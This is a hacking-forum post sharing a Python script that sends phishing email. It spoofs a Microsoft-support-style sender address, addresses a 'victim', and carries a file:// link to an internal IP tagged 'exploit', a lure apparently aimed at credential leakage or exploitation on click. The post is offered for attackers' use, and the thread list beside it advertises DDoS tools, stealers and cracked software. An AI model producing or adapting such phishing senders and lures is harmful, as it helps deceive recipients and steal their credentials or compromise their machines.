Python Script to send Phishing with SSL
by black_chaos - Tuesday September 10, 2024 at 03:01 PM
#1
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Email credentials
sender_email = "webmaster@Microsoftsupport"          # email sender example attacker "webmaster@Microsoftsupprt"
recipient_email = "victim@example.com"                   # Email Victim Here

# Phishing email details
subject = "Important Message"
body = """\
Dear recipient,\n\nThis is an important message. Please click on the following link to proceed: file://192.168.1.7/test!exploit"
"""
# Function to send phishing email
def send_phishing_email(sender_email, recipient_email, subject, body):
    try:
        # Set up the email
        msg = MIMEMultipart()
        msg['From'] = sender_email
        msg['To'] = recipient_email
        msg['Subject'] = subject

        # Attach body to the email
        msg.attach(MIMEText(body, 'plain'))

        # Connect to the SMTP server
        server = smtplib.SMTP('SMTP.mail.expamle.com', 25)
        server.starttls()
        server.sendmail(sender_email, recipient_email, msg.as_string())
        server.quit()

        print("Phishing email sent successfully!")
    except Exception as e:
        print("Error:", e)

# Example usage
send_phishing_email(sender_email, recipient_email, subject, body)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Python Based Automated XSS Testing Tool Loki 41 3,277 Yesterday, 09:33 AM
Last Post: Ox7780
  DDoS Tool Hi-Feds 551 69,869 May 05, 2026, 10:20 PM
Last Post: RK1E
  COLLECTION OF PHISHING TOOLS bloodymary71 183 8,796 May 05, 2026, 09:00 AM
Last Post: cangquuandoe13
  The first stealer 100% made by AI k0t 192 13,394 May 03, 2026, 02:28 AM
Last Post: afro133700
  BLTools 2.8.3 [Cracked] With 23 - 24 Projects APExploits 124 10,494 Apr 30, 2026, 11:12 AM
Last Post: cloud137

Forum Jump:


 Users browsing this forum: 1 Guest(s)